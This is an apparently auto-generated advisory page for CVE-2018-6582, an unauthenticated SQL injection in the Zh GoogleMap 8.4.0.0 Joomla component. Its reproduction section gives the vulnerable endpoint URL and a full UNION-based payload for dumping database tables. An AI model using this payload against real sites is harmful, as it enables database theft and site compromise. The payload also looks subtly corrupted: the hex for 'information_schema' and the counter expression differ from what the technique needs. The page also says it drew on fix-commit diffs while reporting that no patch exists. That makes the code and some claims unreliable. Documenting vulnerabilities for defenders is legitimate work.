CVE-2018-6582
Description
SQL injection in Zh GoogleMap 8.4.0.0 for Joomla! allows unauthenticated attackers to extract database contents via the id parameter.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
SQL injection in Zh GoogleMap 8.4.0.0 for Joomla! allows unauthenticated attackers to extract database contents via the id parameter.
Vulnerability
The Zh GoogleMap component for Joomla! version 8.4.0.0 contains a SQL injection vulnerability in the id parameter of the getPlacemarkDetails, getPlacemarkHoverText, getPathHoverText, and getPathDetails requests. The component fails to sanitize user-supplied input before using it in SQL queries, allowing an attacker to inject arbitrary SQL commands. The vulnerability is present in all four endpoints and does not require any special configuration beyond having the component installed and enabled.
Exploitation
An unauthenticated attacker can exploit this vulnerability by sending crafted HTTP GET or POST requests to the vulnerable endpoints with a malicious id parameter. The attacker does not need any prior authentication or special privileges. The exploit-db entry [1] provides a proof-of-concept that demonstrates injecting a UNION-based SQL payload to retrieve data from the database. The attack can be performed remotely over the network.
Impact
Successful exploitation allows an attacker to extract sensitive information from the Joomla database, including user credentials, session tokens, and other application data. This could lead to full compromise of the Joomla site, including privilege escalation and further attacks on the server. The confidentiality of the database is completely breached, and the attacker may also be able to modify or delete data depending on the database user permissions.
Mitigation
As of the publication date (2018-02-05), no official patch or updated version has been released by the vendor to address this vulnerability. Users are advised to disable or remove the Zh GoogleMap component until a fix is available. Alternatively, implement a web application firewall (WAF) rule to block malicious id parameter values, or apply input validation and parameterized queries as a custom workaround. The component may be considered end-of-life if no further updates are provided.
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
1- Range: = 8.4.0.0
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"Missing input sanitization on the `id` parameter in multiple controller functions allows SQL injection."
Attack vector
An attacker sends a POST request to `index.php?option=com_zhgooglemap&no_html=1&format=raw&task=getPlacemarkDetails` (or similar tasks) with a crafted `id` parameter containing a UNION-based SQL injection payload [ref_id=1]. The `id` value is passed directly into SQL queries without sanitization, allowing the attacker to extract arbitrary data from the database [ref_id=1]. The attack requires no authentication and can be performed over HTTP [ref_id=1].
Affected code
The vulnerability resides in the `com_zhgooglemap` component, specifically in the `controller.php` file. The affected functions are `getPlacemarkDetails()` (line 30), `getPlacemarkHoverText()` (line 363), `getPathHoverText()`, and `getPathDetails()` [ref_id=1]. These functions accept the `id` parameter via POST without proper sanitization, allowing SQL injection [ref_id=1].
What the fix does
No patch is provided in the bundle. The advisory does not include a vendor fix or remediation guidance [ref_id=1]. To close the vulnerability, the application should use prepared statements or parameterized queries for the `id` parameter in all four affected functions (`getPlacemarkDetails`, `getPlacemarkHoverText`, `getPathHoverText`, `getPathDetails`), or at minimum apply proper input validation and escaping [ref_id=1].
Preconditions
- configThe Joomla site must have the Zh GoogleMap 8.4.0.0 component installed and enabled
- networkThe attacker must be able to send HTTP POST requests to the Joomla instance
- authNo authentication is required; the vulnerable endpoints are publicly accessible
Reproduction
1. Identify a Joomla site running the Zh GoogleMap component version 8.4.0.0. 2. Send a POST request to `http://[target]/[path]/index.php?option=com_zhgooglemap&no_html=1&format=raw&task=getPlacemarkDetails` with the `id` parameter set to a UNION-based SQL injection payload, e.g., `-11 UNION ALL SELECT 11,11,11,11,11,11,11,11,CONCAT((SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e116f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%1,4,0x30),0x3a20,table_name,0x3c62723e))))x)),11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11--` [ref_id=1]. 3. The same technique works with `task=getPlacemarkHoverText`, `task=getPathHoverText`, or `task=getPathDetails` [ref_id=1].
Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
1- www.exploit-db.com/exploits/43976/mitreexploitx_refsource_EXPLOIT-DB
News mentions
0No linked articles in our index yet.